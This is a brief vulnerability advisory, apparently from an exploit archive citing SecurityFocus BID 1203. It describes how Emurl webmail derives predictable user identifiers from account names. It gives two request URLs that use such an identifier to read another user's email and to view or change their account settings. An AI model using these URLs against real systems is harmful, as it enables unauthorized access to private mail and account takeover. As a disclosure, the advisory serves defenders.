9 lines
No EOL
611 B
Text
9 lines
No EOL
611 B
Text
source: http://www.securityfocus.com/bid/1203/info
|
|
|
|
Emurl software creates a unique identifier for each user, based on their account name. This identifier is encoded using the ascii value of each character in the account name and augmented by its position. By using a specific URL along with a user's identifier, it is possible to retreive that users e-mail as well as view and change their account settings.
|
|
|
|
To read email:
|
|
http://target/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=<identifier>
|
|
|
|
To view/modify account settings:
|
|
http://target/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=<identifier> |